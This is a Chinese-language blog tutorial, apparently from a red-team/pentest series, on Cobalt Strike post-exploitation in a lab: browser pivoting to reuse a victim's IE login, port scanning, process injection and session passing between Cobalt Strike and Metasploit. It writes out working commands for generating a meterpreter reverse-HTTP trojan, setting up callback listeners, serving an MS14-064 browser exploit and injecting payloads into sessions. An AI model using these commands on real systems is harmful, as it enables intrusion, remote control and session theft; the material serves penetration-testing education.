CobaltStrike使用-第二篇(攻击模块、会话管理、CS-MSF联动)

已于 2022-05-13 11:14:57 修改
阅读量2.1k 收藏 10
点赞数 5
分类专栏: # 内网&提权&红蓝对抗 Sec 文章标签: 安全 提权 内网渗透 web安全 渗透测试
于 2021-11-30 15:55:18 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/q20010619/article/details/121634983
版权

文章首发于Freebuf:https://www.freebuf.com/sectool/306570.html

文章目录

攻击

当我们拿到Victim的Beacon之后就要进行攻击,CS中提供了很多攻击模块,接下来介绍常见使用方法

image-20211129161532099

用户驱动攻击

用户截屏

在目标中选择屏幕截图即可获取截图,截图会在视图->屏幕截图中显示

image-20211129161845795

因为默认会话60秒返回一次,所以再执行操作60秒之后会得到截图,也可以右击会话->选择sleep设置会话时间间隔

image-20211129162035538

右击选择进入Beacon,会出现一个beacon视图,视图中可以看到刚才执行的命令

image-20211129162224469

进程管理

也可以在进程列表中选择进程截图(汉化版有问题)

image-20211129162747452

可以选择进程后对其进行下面工具栏中的操作

任务处理

jobs查看任务列表
jobkill <jid>终止一个任务

进行的任务可以在beacon中使用jobs命令查看

image-20211129163315715

使用jobkill 1将其kill

文件管理

没什么好说的

image-20211129163706278

之后操作后可以在beacon看到执行状态(权限不够的话无法上传)

image-20211129163913162

输入pwd命令可以查看当前目录

远程VNC

VNC,为一种使用RFB协议的屏幕画面分享及远程操作软件。此软件借由网络,可发送键盘与鼠标的动作及即时的屏幕画面。 VNC与操作系统无关,因此可跨平台使用

image-20211129165111649

浏览器代理

只针对IE,其他浏览器无效

如果目标及其使用ie浏览器登录网站,启动浏览器后Hacker将可以用Victim的登录状态登录

比如Victim使用ie浏览器登录网站

http://10.242.197.249/CMS/_Common/xhcms/admin/?r=login

image-20211129170901878

CS开启浏览器代理

image-20211129171414712

开启状态可以在beacon中看到,框中的IP端口就是代理IP

image-20211129171445812

将IP设置为Hacker主机的浏览器的代理

image-20211129172037118

然后Hacker使用浏览器访问页面,成功使用Victim的登录状态登录

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-IsUHq9jq-1638258759698)(https://gitee.com/q_one/oceanpic/raw/master/img2021-12/202111301550710.gif)]

使用命令browserpivot stop停止浏览器代理

browserpivot stop

用户发现&端口扫描

用户发现

net view

端口扫描

help portscan
Use: portscan [targets] [ports] [arp|icmp|none] [max connections]

也可以直接右击->选择端口扫描

在视图->目标中可以看到扫描结果

image-20211129210214665

视图

image-20211129210440645

会话管理

会话派生(传递)使用场景

  1. 将当前会话传递至其他CS团队服务器中,直接右击spawn选择要传递的监听器即可
  2. 将当前会话传递至MSF中联动

会话传递相关命令

Beacon 被设计的最初目的就是向其他的 CS 监听器传递会话。

spawn:进行会话的传递,也可直接右击会话选择spawn命令进行会话的选择。默认情况下,spawn命令会在 rundll32.exe 中派生一个会话。为了更好的隐蔽性,可以找到更合适的程序(如 Internet Explorer) 并使用spawnto命令来说明在派生新会话时候会使用 Beacon 中的哪个程序

spawnto:该命令会要求指明架构(x86 还是 x64)和用于派生会话的程序的完整路径。单独输入spawnto命令然后按 enter 会指示 Beacon 恢复至其默认行为

inject:输入inject + 进程 id + 监听器名来把一个会话注入一个特定的进程中。使用 ps 命令来获取一个当前系统上的进程列表。使用inject [pid] x64来将一个64位 Beacon 注入到一个 64位进程中

spawninject命令都将一个 payload stage 注入进内存中。如果 payload stage 是 HTTP、HTTPS 或 DNS Beacon 并且它无法连接到你,那么将看不到一个会话。如果 payload stage 是一个绑定的 TCP 或 SMB 的 Beacon,这些命令会自动地尝试连接到并控制这些 payload。

dllinjectdllinject + [pid]来将一个反射性 DLL 注入到一个进程中

shinject:使用shinject [pid] [架构] [/路径/.../file.bin]命令来从一个本地文件中注入 shellcode 到一个目标上的进程中。

shspawn:使用shspawn [架构] [/路径/.../file.bin]命令会先派生一个新进程(这个新进程是 spawn to 命令指定的可执行文件),然后把指定的 shellcode 文件( file.bin )注入到这个进程中

dllload:使用dllload [pid] [c:\路径\...\file.dll]来在另一个进程中加载磁盘上的 DLL文件

CS派生会话

环境:

NameSystemIP
TeamServer1Kali192.168.179.128
TeamServer2&MSFKali192.168.179.138
Victim1Winserver2008192.168.179.148

CS新建连接

image-20211129213257264

自身增加会话或者在其他的 teamserver 做备份会话

自身增加会话

image-20211129213827561

选择choose,稍等很快就添加了一个会话

image-20211129213902713

注意:派生出来的会话,进程为rundll32.exe,原来的是powershell

派生到其他的 teamserver 做备份会话

从192.168.179.128这个备份到192.168.179.138这个TeamServer

首先需要在被派生Client中新建一个Listener

image-20211129214353716

在原Client中选择需要派生的会话,右击选择派生

选择刚才创建的Listener

image-20211129214515784

稍等片刻

image-20211129214851662

这两个派生出来的会话,进程都为rundll32.exe

CS派生MSF会话

首先在MSF(IP:192.168.179.138)中创建监听端口

use exploit/multi/handler 
set payload windows/meterpreter/reverse_http #cs4.0后使用Http
set lhost 192.168.179.128
set lport 23333
exploit -j 
# -j(计划任务下进行攻击,后台) -z(攻击完成不遇会话交互)
其他命令
jobs  查看后台攻击任务 
kill <id>  停止某后台攻击任务 
sessions -l  (查看会话)
sessions -i 2   选择会话
sessions -k 2   结束会话

在CS中新建一个Foreign Listener

image-20211129220225077

CS中选择会话->派生选择对应Listener,选择后MSF就可以收到Session

image-20211129222512696

问题解决

因为我使用的CS版本为4.1,Foreign只剩下Http和Https,MSF pyload为windows/foreign/reverse_tcp时会出现以下错误

image-20211129221322889

原因:因为cs设置的payload是windows/foreign/reverse_http,但是msf这边设置的是windows/foreign/reverse_tcp,这两个协议不相同,不可以通信,CS新版中又没有TCP,

解决:将msf设置的payload为window/foreign/reverse_http,再次从cs派生shell,可以拿到meterpreter shell,旧版CS可以使用Tcp

MSF木马->CS会话

1.CS创建HTTP Beacon Listener

image-20211130145156691

2.在Kali中执行以下命令,MSF生成木马

sfvenom -p windows/meterpreter/reverse_http LHOST=192.168.179.128 LPORT=8808 -f exe > /tmp/shell1.exe

# 此处的host为TeamServer IP、端口为Listener设置的端口

image-20211130145114135

3.生成的木马文件通过漏洞,上传到目标靶机并执行

image-20211130145418585

上线CS,Process为shell1.exe

MSFexp->CS会话

和msf木马添加至cs会话一致,只需要在msf设置payload时,将lhost和lport设置为cs http监听器即可

use exploit/windows/browser/ms14_064_ole_code_execution
set srvhost 192.168.0.134
set SRVPORT 80
set payload windows/meterpreter/reverse_http
set LHOST 192.168.0.104
set lport 8888
set disablepayloadhandler True
set PrependMigrate true
set lhost 80
exploit
# 攻击之后会生成url
set disablepayloadhandler True
# 将DisablePayLoadHandler设置为true。这告诉metasploit框架,它不需要在metasploit框架内创建处理程序来服务有效负载连接。
set PrependMigrate true

因为msf使用的payload是浏览器exp,当xp系统的受害人用浏览器访问http://192.168.0.134:80/1Gk97z32pr 这个带有攻击代码的链接时候,成功的话就会在cobalt strike 产生一个会话

MSFsession派生到CS

1.首先msf中需要有session

image-20211130153607651

2.cs新建Listener

image-20211130154226972

3.msf 使用以下模块

msf5> use exploit/windows/local/payload_inject
set payload windows/meterpreter/reverse_http
set session 7
set lhost 192.168.179.128
# IP是CS TeamServer ip
set lport 8888
# port是CS Listener port
set DisablePayloadHandler true
exploit -j

image-20211130154539464
同样要注意是http协议

OceanSec
关注
专栏目录
APT组织最喜欢的工具 Cobalt Strike (CS) 实战
悦分享
08-03 2203
Cobalt Strike是一款以Metasploit为基础的GUI框架式渗透测试工具,自3.0以后已经不在使用Metasploit框架而作为一个独立的平台使用,常被业界人称为CS神器。Cobalt Strike集成了端口转发、服务扫描,自动化溢出,多模式端口监听,win exe木马生成,win dll木马生成,java木马生成,office宏病毒生成,木马捆绑;钓鱼攻击包括:站点克隆,目标信息获取,java执行,浏览器自动攻击等等。...
红队专题-Cobalt strike从小白到飞升手册
aming小老弟
10-09 1313
4.0 2019年12月2日 更新 Cobalt Strike 4.0 手册奇安信 A-TEAMCobalt Strike 是一款 美国Red Team开发的 商业GUI框架式 优秀的渗透测试工具 简称CS为对手模拟渗透测试 和红队行动而设计的 协作工具平台,主要用于执行有目标的攻击和模拟高级威胁者的后渗透行动。可以利用网络漏洞获取主机权限后、从一个强大的图形界面控制所有的活动。因可以调用Mimikatz等其他知名工具并且可以作为团队服务使用,因此广受网络安全人员喜爱。
Cobalt Strike会话管理
f_carey的博客
01-06 554
Cobalt Strike会话管理1 增加 CS 会话2 利用 CS 会话生成 MSF 会话3 利用 msfvenom 生成的文件生成 MSF 会话4 利用 MSF 会话生成 CS 会话 1 增加 CS 会话 添加新侦听器 在获得的 session 会话中选择"新建会话(spawn)":选择新添加的侦听器 获取到新的会话 2 利用 CS 会话生成 MSF 会话 添加新外部侦听器 配置 MSF 如下 msf6 > use exploit/multi/handler
Cobalt Strike 会话管理
yyj1781572的博客
11-17 456
Cobalt Strike 会话管理
Cobalt Strike第二篇使用介绍
千寻的博客
06-17 395
文章目录0x01 Cobalt Strike 模块0x02 View模块0x03 Attacks模块0x04 Report模块0x05 功能模块0x06 监听模块详解摘抄 0x01 Cobalt Strike 模块 New Connection:打开一个新的连接窗口 Preferences:偏好设置,设置颜色、字体等等 Visualization:可视化效果,选择列表形式、图形形式等等 VPN Interfaces:接口设置 Listeners:创建监听器 Close:关闭连接 0x02 View模
Cobalt Strike(五)会话管理
qq_56426046的博客
09-20 1118
测试环境系统服务ipteamservermetasploitvictimvictim。
cobalt-strike.pdf
04-25
配置外部C2可以帮助渗透测试人员更好地模拟真实的攻击场景,以及如何管理CS Beacon和监听器的会话联动。 最后,文档还提供了Cobalt Strike的更新记录,详细列出了从1.11到1.9的不同版本的更新内容,包括功能增加、...
Cobalt StrikeMSF联动
weixin_42035825的博客
03-29 2912
cs会话---->msf会话 注意:必须安装java 我这里使用的是cs4.0版本的,所以后面的有些东西会和以前的有些差异,但并不影响。 进入目录,启动cs的服务端,命令格式:./teamserver ip 密码; 客户端有两种一种是windows版,一种是linux版。这里采用linux版本,但都必须是在java环境里面; 启动客户端: host:服务器端的ip; port:服务器...
内网安全学习(八)---CS&MSF联动
qi_SJQ_的博客
02-17 3696
域横向 CS&MSF 联动 Shell CS->MSF: 创建Foreign监听器 MSF监听模块设置对应端口地址 CS执行Spawn选择监听器 MSF->CSCS创建监听器 MSF载入新模块注入设置对应地址端口 执行CS等待上线 use exploit/windows/local/payload_inject 首先需要两台服务器,一个上线cs一个上线msf 启动上线cs生成木马上线两台主机,之后启动msf。 1)接下来,将CS移交到MSF上: 先添加会话,填写msf主机信息: 配
渗透测试笔记】之【内网渗透——Cobalt Strike会话管理(与MSF联动)】
AA8j的博客
06-29 316
会话管理 1.CS会话派生到CS 首先新建一个监听器用于监听派生的会话 右键要派生的会话点击spawn 然后选择派生到刚刚新建的监听器上,点击choose即可。 也可以先连接其它cs服务器新建监听器,将会话派生到其它cs服务器上 2.CS会话派生到MSF 开启MSF监听: 在CS上创建监听器并指向MSF监听的地址: 通过Spawn将已有会话派生到新创建的监听器中: 可以看到会话成功派生到了MSF上: 3.MSF派生CS会话 1.生成木马直接回连到CS CS新建
内网安全Cobalt StrikeMSF 联动会话 相互转移 )
最新发布
m0_59598029的博客
03-06 817
也有的时候会话MSF 上,但是我们需要 操作更简便 或者 展示力更好,所以我们会把 MSF 上的会话转移到 Cobalt Strike。内网安全Cobalt StrikeMSF 联动会话 相互转移 )(3)开启 Cobalt Strike 工具.在 MSF 会话中 转移 会话CS 上.在 CS 会话中 转移 会话MSF 上.(5)会话转移到 MSF 中.(5)会话转移到 CS 中.(1)上线 MSF 会话.(2)进行监听模式.(4)添加一个监听.(2)添加一个监听.
Cobalt Strike与Metasploit Framewor联动会话传递)功能演示
imtech的博客
02-07 599
Cobalt Strike与Metasploit Framewor联动 会话传递
内网渗透中metasploit与cs之间的会话转交
qq_53829555的博客
09-12 909
内网渗透中,metasploit与cs往往是联合使用的,其意义与重要性不言而喻,涉及到很多后期操作例如联合提权,那么其二者之间会话的转交就是这一切后期操作的根本了这里监听机为kali2021.4版,靶机为win10
Cobalt Strike DLL用于永恒之蓝注入
46的十哥哥的5哥哥
02-05 2339
来自:5号黯区 5号黯区是一支致力于红队攻防研究与培训的团队,官网:http://www.dark5.net 我们在对存在MS17010的漏洞主机进行DLL注入的时候,一般都是用的Meataploit的msfvenom生成出来的,所以每次上线之后基本都是要经过相对比较繁琐的操作之后转到Cobalt Strike去,这样就会显得非常麻烦。 所以可以使用metasploit的msfvenom来...
永恒之蓝ms17-010复现并转移会话CobaltStrike
x0916的博客
06-08 974
ms17-010漏洞及CobaltStrike会话的转移
路由代理(msfCobaltStrike)与内网渗透
weixin_42478365的博客
08-12 2593
kali:192.168.239.0/24 win7:192.168.239.0/24 192.168.52.0/24 win2003:192.168.52.0/24 win2008:192.168.52.0/24 CobaltStrike代理 开启CobaltStrike 在命令行中输入 socks 22 通过火狐浏览器安装proxy扩展插件,并设定socks代理,配置完成以后,便可以成功访问到内网主机192.168.52.0/24的web应用,相关配置如下所示: 之后便可以访问内网 也可以用用
Cobalt Strike下的快速横向扩展
qax
09-12 3279
C2下的横向移动 本来打算今天早点睡的,奈何小区内的施工也不知道脑子怎么想的,凌晨大半夜的各种发动机嗡嗡响,实在是睡不着,想了下,写个文章来记录一下自己最近实战中的一些经验吧。 1.前言 在红队人员拿到一台内网机器后,会进一步利用此权限进行内网的横向移动,从而进一步拿下内网更多的权限。本文只要是总结利用c2快速,简单有效的一个横向扩展。 2.提权 拿到一台内网服务器,如果权限不高的情况下,可能对我们后续的渗透比较局限,所以我们需要先提升到system权限 在C2中有直接提权的exp,官方.
CS攻击菜单详解-后门生成与上线
内心不种满鲜花就会长满杂草
02-28 5457
能够生成如HTA文档、office宏、payload生成器、exe程序。 windows可执行程序exe 可以看到能生成两种windows可执行程序,其分别代表stage分阶段和unstage(stageless)不分阶段。传送门 ——>Cobalt Strike中payload的stage与unstage区别 选择监听器后,按需生成不同类型的exe 然后在目标机器运行即可上线 payload生成器 选择生成如下类型的后门 ——>https://che...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

OceanSec

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值